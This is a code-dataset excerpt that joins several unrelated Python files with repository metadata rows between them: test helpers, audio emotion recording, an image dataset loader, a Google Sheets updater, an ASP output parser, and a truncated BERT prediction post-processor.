        adagucexecutable = ADAGUC_PATH + "/bin/adagucserver"
        adagucargs = [adagucexecutable]
        if args is not None:
            adagucargs = adagucargs + args
        os.chdir(ADAGUC_PATH + "/tests")
        filetogenerate = BytesIO()
        status, headers = CGIRunner().run(adagucargs, url=url, output=filetogenerate,
                                          env=adagucenv, path=path, isCGI=isCGI)
        if (status != 0 and showLogOnError) or showLog:
            print("\n\n--- START ADAGUC DEBUG INFO ---")
            print("Adaguc-server has non zero exit status %d " % status)
            if not isCGI:
                print(filetogenerate.getvalue().decode())
            else:
                self.printLogFile()
            if status == -9:
                print("Process: Killed")
            if status == -11:
                print("Process: Segmentation Fault ")
            if len(headers) != 0:
                print("=== START ADAGUC HTTP HEADER ===")
                print(headers)
                print("=== END ADAGUC HTTP HEADER ===")
            else:
                print("Process: No HTTP Headers written")
            print("--- END ADAGUC DEBUG INFO ---\n")
        # Both branches of the original returned the same triple; collapsed.
        return [status, filetogenerate, headers]

    def writetofile(self, filename, data):
        """Write raw bytes to *filename*."""
        with open(filename, 'wb') as f:
            f.write(data)

    def readfromfile(self, filename):
        """Read raw bytes from *filename*, resolved under $ADAGUC_PATH/tests."""
        ADAGUC_PATH = os.environ['ADAGUC_PATH']
        with open(ADAGUC_PATH + "/tests/" + filename, 'rb') as f:
            return f.read()

    def cleanTempDir(self):
        """Remove and recreate the $ADAGUC_TMP directory."""
        ADAGUC_TMP = os.environ['ADAGUC_TMP']
        try:
            shutil.rmtree(ADAGUC_TMP)
        except OSError:
            # Directory may not exist yet on the first run.
            pass
        self.mkdir_p(os.environ['ADAGUC_TMP'])
        return

    def mkdir_p(self, directory):
        """Create *directory* (including parents) if it does not exist."""
        if not os.path.exists(directory):
            os.makedirs(directory)

    def compareGetCapabilitiesXML(self, testresultFileLocation, expectedOutputFileLocation):
        """Compare two GetCapabilities XML files, ignoring volatile content.

        Strips the default namespace, the Service KeywordList/ServerInfo
        sections (build date/version) and all BoundingBox extents (values vary
        between Proj library versions), then compares the remaining trees.
        Returns True when they match; prints a hint otherwise.
        """
        expectedxml = self.readfromfile(expectedOutputFileLocation)
        testxml = self.readfromfile(testresultFileLocation)
        obj1 = objectify.fromstring(
            re.sub(b' xmlns="[^"]+"', b'', expectedxml, count=1))
        obj2 = objectify.fromstring(
            re.sub(b' xmlns="[^"]+"', b'', testxml, count=1))
        # Remove ADAGUC build date and version from keywordlists
        try:
            for child in obj1.findall("Service/KeywordList")[0]:
                child.getparent().remove(child)
            for child in obj2.findall("Service/KeywordList")[0]:
                child.getparent().remove(child)
        except Exception:
            # Section absent in one of the documents; nothing to strip.
            pass
        try:
            for child in obj1.findall("Service/ServerInfo")[0]:
                child.getparent().remove(child)
            for child in obj2.findall("Service/ServerInfo")[0]:
                child.getparent().remove(child)
        except Exception:
            pass
        # Boundingbox extent values are too varying by different Proj libraries
        def removeBBOX(root):
            if (root.tag.title() == "Boundingbox"):
                # root.getparent().remove(root)
                try:
                    del root.attrib["minx"]
                    del root.attrib["miny"]
                    del root.attrib["maxx"]
                    del root.attrib["maxy"]
                except KeyError:
                    pass
            for elem in root.getchildren():
                removeBBOX(elem)
        removeBBOX(obj1)
        removeBBOX(obj2)
        result = etree.tostring(obj1)
        expect = etree.tostring(obj2)
        if (result == expect) is False:
            print("\nExpected XML is different, file \n\"%s\"\n should be equal to \n\"%s\"" % (
                testresultFileLocation, expectedOutputFileLocation))
        return result == expect
| 31.967742
| 118
| 0.55439
| 4,764
| 0.961453
| 0
| 0
| 0
| 0
| 0
| 0
| 864
| 0.174369
|
3692f4808105d5ea767d1f2ed8ac2212b0cfd4ec
| 4,905
|
py
|
Python
|
emotion_recognition_using_speech/test.py
|
TomKingsfordUoA/emotion-recognition-using-speech
|
d3e115e32c06c511e70cb50a92097bafd00d5e6c
|
[
"MIT"
] | null | null | null |
emotion_recognition_using_speech/test.py
|
TomKingsfordUoA/emotion-recognition-using-speech
|
d3e115e32c06c511e70cb50a92097bafd00d5e6c
|
[
"MIT"
] | null | null | null |
emotion_recognition_using_speech/test.py
|
TomKingsfordUoA/emotion-recognition-using-speech
|
d3e115e32c06c511e70cb50a92097bafd00d5e6c
|
[
"MIT"
] | null | null | null |
import os
import wave
from array import array
from struct import pack
from sys import byteorder
import pyaudio
import soundfile
from .emotion_recognition import EmotionRecognizer
from .utils import get_best_estimators
THRESHOLD = 500
CHUNK_SIZE = 1024
FORMAT = pyaudio.paInt16
RATE = 16000
SILENCE = 30
def is_silent(snd_data):
    "Returns 'True' if below the 'silent' threshold"
    loudest_sample = max(snd_data)
    return loudest_sample < THRESHOLD
def normalize(snd_data):
    "Average the volume out"
    MAXIMUM = 16384
    # Scale so the loudest sample reaches MAXIMUM (half of int16 range).
    scale = float(MAXIMUM) / max(abs(sample) for sample in snd_data)
    return array('h', (int(sample * scale) for sample in snd_data))
def trim(snd_data):
    "Trim the blank spots at the start and end"
    def _strip_leading(samples):
        # Skip everything until the first sample above THRESHOLD, keep the rest.
        started = False
        kept = array('h')
        for sample in samples:
            if started or abs(sample) > THRESHOLD:
                started = True
                kept.append(sample)
        return kept

    trimmed = _strip_leading(snd_data)   # drop leading silence
    trimmed.reverse()
    trimmed = _strip_leading(trimmed)    # drop trailing silence
    trimmed.reverse()
    return trimmed
def add_silence(snd_data, seconds):
    "Add silence to the start and end of 'snd_data' of length 'seconds' (float)"
    pad_length = int(seconds * RATE)
    padded = array('h', [0] * pad_length)
    padded.extend(snd_data)
    padded.extend([0] * pad_length)
    return padded
def record():
    """
    Record a word or words from the microphone and
    return the data as an array of signed shorts.
    Normalizes the audio, trims silence from the
    start and end, and pads with 0.5 seconds of
    blank sound to make sure VLC et al can play
    it without getting chopped off.
    """
    p = pyaudio.PyAudio()
    # Mono 16-bit stream at RATE Hz, read CHUNK_SIZE frames at a time.
    stream = p.open(format=FORMAT, channels=1, rate=RATE,
        input=True, output=True,
        frames_per_buffer=CHUNK_SIZE)
    num_silent = 0
    snd_started = False
    r = array('h')
    while 1:
        # little endian, signed short
        snd_data = array('h', stream.read(CHUNK_SIZE))
        if byteorder == 'big':
            # Host is big-endian: swap to match the little-endian stream data.
            snd_data.byteswap()
        r.extend(snd_data)
        silent = is_silent(snd_data)
        if silent and snd_started:
            num_silent += 1
        elif not silent and not snd_started:
            snd_started = True
        # Stop once SILENCE silent chunks have been seen after sound started.
        # NOTE(review): num_silent is never reset when sound resumes, so
        # non-contiguous quiet chunks accumulate toward the stop condition -
        # confirm this is the intended end-of-utterance behavior.
        if snd_started and num_silent > SILENCE:
            break
    sample_width = p.get_sample_size(FORMAT)
    stream.stop_stream()
    stream.close()
    p.terminate()
    r = normalize(r)
    r = trim(r)
    r = add_silence(r, 0.5)
    return sample_width, r
def record_to_file(path):
    "Records from the microphone and outputs the resulting data to 'path'"
    sample_width, data = record()
    # Pack the samples as little-endian signed shorts.
    frames = pack('<' + ('h' * len(data)), *data)
    # Bug fix: use the wave context manager so the WAV header is finalized and
    # the file handle closed even if a write fails (the original leaked the
    # handle on error).
    with wave.open(path, 'wb') as wf:
        wf.setnchannels(1)
        wf.setsampwidth(sample_width)
        wf.setframerate(RATE)
        wf.writeframes(frames)
def get_estimators_name(estimators):
    """Given (estimator, _, _) tuples, return a comma-joined string of quoted
    class names and a {class_name: estimator} lookup dict."""
    quoted_names = ['"{}"'.format(est.__class__.__name__) for est, _, _ in estimators]
    lookup = {name.strip('"'): est for name, (est, _, _) in zip(quoted_names, estimators)}
    return ','.join(quoted_names), lookup
if __name__ == "__main__":
    # Build the CLI choices from the tuned estimators shipped with the package.
    estimators = get_best_estimators(True)
    estimators_str, estimator_dict = get_estimators_name(estimators)
    import argparse
    parser = argparse.ArgumentParser(description="""
                    Testing emotion recognition system using your voice,
                    please consider changing the model and/or parameters as you wish.
                    """)
    parser.add_argument("-e", "--emotions", help=
                        """Emotions to recognize separated by a comma ',', available emotions are
                        "neutral", "calm", "happy" "sad", "angry", "fear", "disgust", "ps" (pleasant surprise)
                        and "boredom", default is "sad,neutral,happy"
                        """, default="sad,neutral,happy")
    parser.add_argument("-m", "--model", help=
                        """
                        The model to use, 8 models available are: {},
                        default is "BaggingClassifier"
                        """.format(estimators_str), default="BaggingClassifier")
    # Parse the arguments passed
    args = parser.parse_args()
    # Audio descriptors extracted per clip; verbose=0 keeps training quiet.
    features = ["mfcc", "chroma", "mel"]
    detector = EmotionRecognizer(estimator_dict[args.model], emotions=args.emotions.split(","), features=features, verbose=0)
    detector.train()
    print("Test accuracy score: {:.3f}%".format(detector.test_score()*100))
    # print("Please talk")
    # Capture one utterance from the microphone into test.wav.
    filename = "test.wav"
    record_to_file(filename)
| 30.65625
| 132
| 0.596738
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,637
| 0.333741
|
369300d0c9a3d754cf6fa5fd20a01c6192f0204c
| 2,032
|
py
|
Python
|
training/dataset.py
|
liucong3/camelyon17
|
bf6947ab5f59fc98f58f4459115cde5c815f2c5b
|
[
"MIT"
] | null | null | null |
training/dataset.py
|
liucong3/camelyon17
|
bf6947ab5f59fc98f58f4459115cde5c815f2c5b
|
[
"MIT"
] | 1
|
2021-09-07T04:56:15.000Z
|
2021-09-07T04:56:15.000Z
|
training/dataset.py
|
liucong3/camelyon17
|
bf6947ab5f59fc98f58f4459115cde5c815f2c5b
|
[
"MIT"
] | 1
|
2021-09-17T02:57:42.000Z
|
2021-09-17T02:57:42.000Z
|
import numpy as np
import torch.utils.data as data
import csv
import cv2
from PIL import Image
from utils import progress_bar
class CamelDataset(data.Dataset):
    """ camelyon17 dataset class for pytorch dataloader

    Reads (image_path, label) rows from a CSV, loads images with OpenCV, and
    keeps a 1:1 balance of positive ('1') and negative samples up to `limit`
    total samples.
    """

    def __init__(self, csv_path='train.csv', limit=0, transform=None, target_transform=None):
        super(CamelDataset, self).__init__()
        self.transform = transform
        self.target_transform = target_transform
        self.data = []
        self.labels = []
        p_rows = []
        n_rows = []
        # Bug fix: the CSV handle was opened but never closed; 'with'
        # guarantees closure even if a row is malformed.
        with open(csv_path, 'r', encoding='utf-8') as csv_file:
            for img, label in csv.reader(csv_file):
                if label == '1':
                    p_rows.append([img, label])
                else:
                    n_rows.append([img, label])
        cnt = 0
        min_len = min(len(p_rows), len(n_rows))
        # zip() truncates to the shorter class list, keeping classes balanced.
        for (p_img, p_label), (n_img, n_label) in zip(p_rows, n_rows):
            progress_bar(cnt, min_len, csv_path)
            p_array = cv2.imread(p_img, cv2.IMREAD_COLOR)
            self.data.append(p_array)
            self.labels.append(p_label)
            n_array = cv2.imread(n_img, cv2.IMREAD_COLOR)
            self.data.append(n_array)
            self.labels.append(n_label)
            cnt += 1
            # Each iteration adds one positive + one negative sample.
            if cnt > limit / 2:
                break
        self.data = np.array(self.data)
        self.labels = np.array(self.labels)

    def __getitem__(self, index):
        """
        Args:
            index (int): Index
        Returns:
            tuple: (image, target) where target is index of the target class.
        """
        img = self.data[index]
        # Convert the raw ndarray to PIL so torchvision transforms apply.
        img = Image.fromarray(img)
        target = self.labels[index]
        if self.transform is not None:
            img = self.transform(img)
        if self.target_transform is not None:
            target = self.target_transform(target)
        return img, target

    def __len__(self):
        # Number of loaded samples (positives + negatives).
        return len(self.data)
| 27.835616
| 93
| 0.563976
| 1,901
| 0.935531
| 0
| 0
| 0
| 0
| 0
| 0
| 240
| 0.11811
|
369370477fede6ca05479665d356d7b8ddbbef42
| 211
|
py
|
Python
|
src/settings/settings.py
|
lamas1901/telegram__pdf-bot
|
995bd3a41edba744efc07a99296ff109427ed310
|
[
"MIT"
] | null | null | null |
src/settings/settings.py
|
lamas1901/telegram__pdf-bot
|
995bd3a41edba744efc07a99296ff109427ed310
|
[
"MIT"
] | null | null | null |
src/settings/settings.py
|
lamas1901/telegram__pdf-bot
|
995bd3a41edba744efc07a99296ff109427ed310
|
[
"MIT"
] | null | null | null |
from ..utils import get_env_var
from pathlib import Path
# Package root: two levels up from this settings module.
BASE_DIR = Path(__file__).parent.parent
# Values pulled from environment variables via get_env_var
# (presumably raises or defaults when unset - TODO confirm in ..utils).
TG_TOKEN = get_env_var('TG_TOKEN')  # Telegram bot API token
YMONEY_TOKEN = get_env_var('YTOKEN')  # payment provider token (env var is 'YTOKEN')
PROMO_CODE = get_env_var('PROMO_CODE')  # promo code accepted by the bot
| 21.1
| 39
| 0.78673
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 30
| 0.14218
|
369463a55c830c970eeba872097925e45f0b42da
| 5,365
|
py
|
Python
|
sheet.py
|
roocell/myfreelapextract
|
933cf6c50155f0659e3b06f8caf38425920f349d
|
[
"Apache-2.0"
] | null | null | null |
sheet.py
|
roocell/myfreelapextract
|
933cf6c50155f0659e3b06f8caf38425920f349d
|
[
"Apache-2.0"
] | null | null | null |
sheet.py
|
roocell/myfreelapextract
|
933cf6c50155f0659e3b06f8caf38425920f349d
|
[
"Apache-2.0"
] | null | null | null |
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import pprint
import logging
import random
# https://medium.com/daily-python/python-script-to-edit-google-sheets-daily-python-7-aadce27846c0
# tutorial is older, so the googple API setup is a little outdated
# call directly to test
# python sheettest.py
# create logger
log = logging.getLogger(__file__)
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()  # log to the console
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(filename)s:%(lineno)d %(message)s')
ch.setFormatter(formatter)
log.addHandler(ch)
# Column letters used to map a split index to a spreadsheet column.
# NOTE(review): the list skips "W" (…,"V","X",…) - confirm whether intentional.
alphabet = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L",
            "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "X", "Y", "Z"]
#Authorize the API
scope = [
    'https://www.googleapis.com/auth/drive',
    'https://www.googleapis.com/auth/drive.file'
]
file_name = 'client_key.json'
# NOTE: authorization runs at import time; a missing/invalid key file raises
# here rather than at first sheet access.
creds = ServiceAccountCredentials.from_json_keyfile_name(file_name,scope)
client = gspread.authorize(creds)
gsheetfile = 'Dynamic Sprint Velocity Profiling'
def updateEntry(session, tagid, splitsStrings):
    """Write one runner's splits into the spreadsheet.

    session: text of the 'session' column on myfreelap; a worksheet with
        this name is duplicated from "template" if it does not exist yet.
    tagid: the runner's id; looked up (or added) in the "Athlete Roster".
    splitsStrings: list of splits as "MM:SS.ss" strings, e.g. "00:03.06".
    """
    log.debug(splitsStrings)
    splits = _parse_splits(splitsStrings)
    # Find tagid in the roster; if not present, add it.
    rosterIdRow = _find_or_create_roster_row(tagid)
    sheet = _get_session_sheet(session)
    _write_session_header(sheet, session, len(splits))
    # In the session sheet, splits start in column 'G'.
    # Roster -> session row mapping: 6,7,8,9... -> 10, 21, 32, 43...
    # https://alteredqualia.com/visualization/hn/sequence/
    splitCol = 7  # 'G'
    splitRow = 11 * (rosterIdRow - 5) - 1  # loop-invariant, hoisted
    for i, s in enumerate(splits):
        sheet.update_cell(splitRow, splitCol + i, s)
    log.debug(splits)
    # @TODO append trials rather than just overwrite the first one
    # this way you can see the multiple curves on the plot
    # there are multiple trials - but we'll just fill in the one for now
    # since this is just about the dynamic plotting.


def _parse_splits(splitsStrings):
    """Convert "MM:SS.ss" strings to seconds as floats ("00:03.06" -> 3.06)."""
    splits = []
    for s in splitsStrings:
        parts = s.split(':')
        splits.append(float(parts[0]) * 60 + float(parts[1]))
    return splits


def _find_or_create_roster_row(tagid):
    """Return the roster row holding tagid, creating an entry if absent."""
    sheet = client.open(gsheetfile).worksheet("Athlete Roster")
    rosterIdCol = 3  # column 'C'
    found = sheet.find(tagid)
    if found is not None:  # bug fix: was `== None` comparison style
        log.debug("found existing tagid at {},{}".format(found.row, found.col))
        return found.row
    # Not on the roster yet: take the first empty slot in column C.
    # Ids start at C6; the i+5 offset reproduces the original mapping —
    # TODO confirm it matches the actual sheet layout.
    rosterlist = sheet.col_values(rosterIdCol)
    rosterIdRow = 0
    for i, r in enumerate(rosterlist, start=1):
        if r == "":
            rosterIdRow = i + 5  # starts @ C6
            break
    if rosterIdRow == 0:
        # Bug fix: previously, when no empty cell was found, row 0 was kept
        # and the caller computed a negative split row. Append after the
        # last roster entry instead, keeping the same +5 offset.
        rosterIdRow = len(rosterlist) + 6
    sheet.update_cell(rosterIdRow, rosterIdCol, tagid)
    log.debug("created new tagid at {},{}".format(rosterIdRow, rosterIdCol))
    return rosterIdRow


def _get_session_sheet(session):
    """Return the worksheet named session, duplicating "template" if missing."""
    try:
        return client.open(gsheetfile).worksheet(session)
    except gspread.exceptions.WorksheetNotFound:
        # Duplicate the template sheet and rename it to the session name.
        sheet = client.open(gsheetfile).worksheet("template")
        log.debug("creating {} from template".format(session))
        sheet.duplicate(insert_sheet_index=None, new_sheet_name=session)
        return client.open(gsheetfile).worksheet(session)


def _write_session_header(sheet, session, nsplits):
    """Set distance / cone count and clear unused cone-placement cells."""
    cones = nsplits + 1
    # Distance is inferred from the session name; defaults to 40.
    distance = 40
    if "60" in session:
        distance = 60
    elif "100" in session:
        distance = 100
    log.debug("updating distance and cones {} {}".format(distance, cones))
    sheet.update_cell(3, 8, distance)  # H3
    sheet.update_cell(3, 12, cones)  # L3
    # Clear the "Cone / Gate Placement" cells (through P6) that are not
    # required, so the plot's x-axis only shows the cones actually used.
    log.debug("clearing Cone / Gate Placement to fix plot x-axis")
    start = alphabet[alphabet.index("G") + nsplits] + str(6)
    end = "P6"
    cell_list = sheet.range(start + ":" + end)
    for cell in cell_list:
        cell.value = ""
    sheet.update_cells(cell_list)
# Smoke test, run when this script is executed directly (python sheet.py).
def main():
    """Exercise the sheet connection and updateEntry() against live data."""
    worksheet = client.open(gsheetfile).worksheet("test")
    # Fill B1..B5 with random values so reruns visibly change the sheet.
    for row in range(1, 6):
        worksheet.update('B{}'.format(row), random.randint(1, 100))
    # Dump the whole sheet for manual inspection.
    pprint.PrettyPrinter().pprint(worksheet.get_all_records())
    # Drive updateEntry() with a canned session / tag / splits triple.
    updateEntry("Hr6 40yrd WK1", "3 AC-3476", ["00:03.06", "00:02.73", "00:03.09"])
# Run the smoke test when invoked directly: python sheet.py
if __name__ == "__main__":
    main()
| 35.529801
| 97
| 0.641007
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,225
| 0.414725
|
3694d1a4cd60ecc1e34d895dba4a09639f943705
| 3,426
|
py
|
Python
|
image_generation/parse_models.py
|
pudumagico/clevr-dataset-gen
|
1e7e5e2585ae021b2a3f0ea509e5fa63f3d26b86
|
[
"BSD-3-Clause"
] | null | null | null |
image_generation/parse_models.py
|
pudumagico/clevr-dataset-gen
|
1e7e5e2585ae021b2a3f0ea509e5fa63f3d26b86
|
[
"BSD-3-Clause"
] | null | null | null |
image_generation/parse_models.py
|
pudumagico/clevr-dataset-gen
|
1e7e5e2585ae021b2a3f0ea509e5fa63f3d26b86
|
[
"BSD-3-Clause"
] | null | null | null |
import sys
import re
from typing import Sized
def parse_models(models_file):
    r"""Parse ASP solver output and write fact files for each answer set.

    models_file: path to a solver log; every line following a line that
        contains 'Answer' is taken to be one model (answer set).

    For model i this writes:
      asp_models/positive_i.lp -- the hasColor/hasShape/hasSize/hasTexture
                                  atoms of the model
      asp_models/negative_i.lp -- the outHas* atoms rewritten as has*, plus
                                  the positive atoms of every object that
                                  received no outHas* correction

    NOTE: the atom regexes assume single-digit object ids (\d, not \d+),
    as in the original code.
    """
    # In/out atom patterns; list order fixes the atom order in the output
    # files (color, shape, size, texture — same as the original).
    in_patterns = [
        re.compile(r'hasColor\(\d,\w+\)'),
        re.compile(r'hasShape\(\d,\w+\)'),
        re.compile(r'hasSize\(\d,\w+\)'),
        re.compile(r'hasTexture\(\d,\w+\)'),
    ]
    out_patterns = [
        re.compile(r'outHasColor\(\d,\w+\)'),
        re.compile(r'outHasShape\(\d,\w+\)'),
        re.compile(r'outHasSize\(\d,\w+\)'),
        re.compile(r'outHasTexture\(\d,\w+\)'),
    ]

    def atom_position(atom):
        # The object id is the first digit inside the atom.
        return int(re.search(r'\d', atom).group())

    # Collect model lines: each line directly after a line containing 'Answer'.
    models = []
    next_line_model = False
    with open(models_file) as file:
        for line in file:
            if next_line_model:
                models.append(line.strip())
                next_line_model = False
            if 'Answer' in line:
                next_line_model = True

    positive_models = []
    negative_models = []
    for model in models:
        positive_atoms = []
        for pat in in_patterns:
            positive_atoms.extend(pat.findall(model))
        positive_models.append(' '.join(positive_atoms))

        out_atoms = []
        for pat in out_patterns:
            out_atoms.extend(pat.findall(model))
        # Positions that received a correction. Bug fixes vs. the original:
        # (1) positions are gathered from ALL outHas* atoms, not only from
        #     outHasColor, so shape/size/texture-only corrections also
        #     suppress the object's positive atoms;
        # (2) object id 0 is no longer dropped (the old
        #     `if position and ...` test was falsy for 0).
        out_positions = {atom_position(a) for a in out_atoms}
        # Rewrite each out atom to its positive form, e.g.
        # outHasColor(1,red) -> hasColor(1,red).
        negative_atoms = [a.replace('outHas', 'has', 1) for a in out_atoms]
        # Keep the positive atoms of objects that were not corrected.
        negative_atoms.extend(
            a for a in positive_atoms if atom_position(a) not in out_positions)
        negative_models.append(' '.join(negative_atoms))

    print(positive_models)
    print('asd')
    print(negative_models)

    # One file per model; `with` guarantees the handles are closed
    # (the original leaked open file objects).
    for i, text in enumerate(positive_models):
        with open("asp_models/positive_" + str(i) + ".lp", "w") as text_file:
            text_file.write(text)
    for i, text in enumerate(negative_models):
        with open("asp_models/negative_" + str(i) + ".lp", "w") as text_file:
            text_file.write(text)
if __name__ == '__main__':
    # argv[1]: path to the solver output file to parse.
    # NOTE(review): parse_models returns None; binding it is misleading.
    base_model = parse_models(sys.argv[1])
| 31.722222
| 76
| 0.558669
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 415
| 0.121133
|
3694d7e8c0ea23a87ec0351e6dfd24cef2e1613b
| 17,193
|
py
|
Python
|
Codes of the SMD2II model/Codes of Transfer-learning of Bert (stage I classification)/produce_submit_json_file.py
|
0AnonymousSite0/Social-media-data-to-Interrelated-informtion-to-Parameters-of-virtual-road-model
|
3043f316bf6af3530dec894881c8f63607084759
|
[
"MIT"
] | 1
|
2022-03-26T10:40:10.000Z
|
2022-03-26T10:40:10.000Z
|
Codes of the SMD2II model/Codes of Transfer-learning of Bert (stage I classification)/produce_submit_json_file.py
|
0AnonymousSite0/Social-media-data-to-Interrelated-informtion-to-Parameters-of-virtual-road-model
|
3043f316bf6af3530dec894881c8f63607084759
|
[
"MIT"
] | null | null | null |
Codes of the SMD2II model/Codes of Transfer-learning of Bert (stage I classification)/produce_submit_json_file.py
|
0AnonymousSite0/Social-media-data-to-Interrelated-informtion-to-Parameters-of-virtual-road-model
|
3043f316bf6af3530dec894881c8f63607084759
|
[
"MIT"
] | null | null | null |
# coding=utf-8
import os
import json
# Locate the directory holding the newest model predictions.
def get_latest_model_predict_data_dir(new_epochs_ckpt_dir=None):
    """Return the newest model-prediction output directory.

    If new_epochs_ckpt_dir is None, the newest checkpoint directory (by
    modification time) under output/sequnce_infer_out is located;
    otherwise the given directory is returned unchanged.
    """
    # Return the most recently modified entry inside test_report.
    def new_report(test_report):
        lists = os.listdir(test_report)  # every file and directory inside test_report
        lists.sort(key=lambda fn: os.path.getmtime(test_report + "/" + fn))  # oldest -> newest
        file_new = os.path.join(test_report, lists[-1])  # newest entry
        return file_new
    if new_epochs_ckpt_dir is None:
        # Output directory of the sequence-inference step.
        input_new_epochs = os.path.join(
            os.path.abspath(os.path.join(os.path.dirname(__file__), "output")), "sequnce_infer_out")
        # Newest epoch directory.
        new_ckpt_dir = new_report(input_new_epochs)
        # NOTE(review): new_report already returns an absolute path here, so
        # os.path.join drops input_new_epochs and this is a no-op join.
        input_new_epochs_ckpt = os.path.join(input_new_epochs, new_ckpt_dir)
        # Newest checkpoint directory inside the newest epoch directory.
        new_epochs_ckpt_dir = new_report(input_new_epochs_ckpt)
        if not os.path.exists(new_ckpt_dir):
            raise ValueError("路径不存在!{}".format(new_epochs_ckpt_dir))
    return new_epochs_ckpt_dir
# Maps each relation (predicate) to the (object_type, subject_type) pairs it
# may hold; derived from the raw_data file all_50_schemas. Used by
# produce_output_file() to fill object_type/subject_type in the output JSON.
# The commented-out entries are disabled relations (including the original
# Chinese schema), kept verbatim for reference.
schemas_dict_relation_2_object_subject_type = {
    'Road_status':[('Status','Road')],
    'Lane_status':[('Status','Lane')],
    'Road_position':[('Position_of_road','Road')],
    # 'At':[('Road','Road')],
    # 'PRIOR':[('Road','Road')],
    # 'PAST':[('Road','Road')],
    # 'Bet':[('Road','Road')],
    'Lane_of_Road':[('Road','Lane')],
    'Lane_direction':[('Direction_of_lane','Lane')],
    'Lane_position':[('Position_of_lane','Lane')],
    'Road_direction':[('Direction_of_road','Road')],
    #'Lane_number':[('Number','Lane')]
    # '父亲': [('人物', '人物')],
    # '妻子': [('人物', '人物')],
    # '母亲': [('人物', '人物')],
    # '丈夫': [('人物', '人物')],
    # '祖籍': [('地点', '人物')],
    # '总部地点': [('地点', '企业')],
    # '出生地': [('地点', '人物')],
    # '目': [('目', '生物')],
    # '面积': [('Number', '行政区')],
    # '简称': [('Text', '机构')],
    # '上映时间': [('Date', '影视作品')],
    # '所属专辑': [('音乐专辑', '歌曲')],
    # '注册资本': [('Number', '企业')],
    # '首都': [('城市', '国家')],
    # '导演': [('人物', '影视作品')],
    # '字': [('Text', '历史人物')],
    # '身高': [('Number', '人物')],
    # '出品公司': [('企业', '影视作品')],
    # '修业年限': [('Number', '学科专业')],
    # '出生日期': [('Date', '人物')],
    # '制片人': [('人物', '影视作品')],
    # '编剧': [('人物', '影视作品')],
    # '国籍': [('国家', '人物')],
    # '海拔': [('Number', '地点')],
    # '连载网站': [('网站', '网络小说')],
    # '朝代': [('Text', '历史人物')],
    # '民族': [('Text', '人物')],
    # '号': [('Text', '历史人物')],
    # '出版社': [('出版社', '书籍')],
    # '主持人': [('人物', '电视综艺')],
    # '专业代码': [('Text', '学科专业')],
    # '歌手': [('人物', '歌曲')],
    # '作词': [('人物', '歌曲')],
    # '主角': [('人物', '网络小说')],
    # '董事长': [('人物', '企业')],
    # '成立日期': [('Date', '机构'), ('Date', '企业')],
    # '毕业院校': [('学校', '人物')],
    # '占地面积': [('Number', '机构')],
    # '官方语言': [('语言', '国家')],
    # '邮政编码': [('Text', '行政区')],
    # '人口数量': [('Number', '行政区')],
    # '所在城市': [('城市', '景点')],
    # '作者': [('人物', '图书作品')],
    # '作曲': [('人物', '歌曲')],
    # '气候': [('气候', '行政区')],
    # '嘉宾': [('人物', '电视综艺')],
    # '主演': [('人物', '影视作品')],
    # '改编自': [('作品', '影视作品')],
    # '创始人': [('人物', '企业')]
    }
class File_Management(object):
    """Read the pipeline's TXT input files and return their contents as lists."""
    def __init__(self, TEST_DATA_DIR=None, MODEL_OUTPUT_DIR=None, Competition_Mode=True):
        # Directory with the test input files.
        self.TEST_DATA_DIR = TEST_DATA_DIR
        # Resolved to the newest model-prediction directory if None is given.
        self.MODEL_OUTPUT_DIR = get_latest_model_predict_data_dir(MODEL_OUTPUT_DIR)
        # When True, all input files must have the same number of lines.
        self.Competition_Mode = Competition_Mode
    def file_path_and_name(self):
        """Return the list of input file paths and their logical names."""
        text_sentence_file_path = os.path.join(self.TEST_DATA_DIR, "text_and_one_predicate.txt")
        token_in_file_path = os.path.join(self.TEST_DATA_DIR, "token_in_not_UNK_and_one_predicate.txt")
        predicate_token_label_file_path = os.path.join(self.MODEL_OUTPUT_DIR, "token_label_predictions.txt")
        file_path_list = [text_sentence_file_path, token_in_file_path, predicate_token_label_file_path]
        file_name_list = ["text_sentence_list", "token_in_not_NUK_list ", "token_label_list",]
        if not self.Competition_Mode:
            # Outside competition mode, also load the reference spo file if present.
            spo_out_file_path = os.path.join(self.TEST_DATA_DIR, "spo_out.txt")
            if os.path.exists(spo_out_file_path):
                file_path_list.append(spo_out_file_path)
                file_name_list.append("reference_spo_list")
        return file_path_list, file_name_list
    def read_file_return_content_list(self):
        """Read every input file; return (per-file line lists, common line count)."""
        file_path_list, file_name_list = self.file_path_and_name()
        content_list_summary = []
        for file_path in file_path_list:
            with open(file_path, "r", encoding='utf-8') as f:
                content_list = f.readlines()
                content_list = [content.replace("\n", "") for content in content_list]
                content_list_summary.append(content_list)
        if self.Competition_Mode:
            content_list_length_summary = [(file_name, len(content_list)) for content_list, file_name in
                                           zip(content_list_summary, file_name_list)]
            file_line_number = self._check_file_line_numbers(content_list_length_summary)
            print("Competition_Mode=True, check file line pass!")
            print("输入文件行数一致,行数是: ", file_line_number)
        else:
            file_line_number = len(content_list_summary[0])
            print("first file line number: ", file_line_number)
            print("do not check file line! if you need check file line, set Competition_Mode=True")
        print("\n")
        return content_list_summary, file_line_number
    def _check_file_line_numbers(self, content_list_length_summary):
        # Assert every file has the same number of lines as the first one.
        content_list_length_file_one = content_list_length_summary[0][1]
        for file_name, file_line_number in content_list_length_summary:
            assert file_line_number == content_list_length_file_one
        return content_list_length_file_one
class Sorted_relation_and_entity_list_Management(File_Management):
    """
    Build the list of candidate relations (sorted by predicted probability)
    and the list of entities (sorted by their order in the original sentence).
    """
    def __init__(self, TEST_DATA_DIR, MODEL_OUTPUT_DIR, Competition_Mode=False):
        File_Management.__init__(self, TEST_DATA_DIR=TEST_DATA_DIR, MODEL_OUTPUT_DIR=MODEL_OUTPUT_DIR, Competition_Mode=Competition_Mode)
        # Relation label list: maps the model's numeric outputs to labels.
        # The commented-out line is the original Chinese label set, kept for reference.
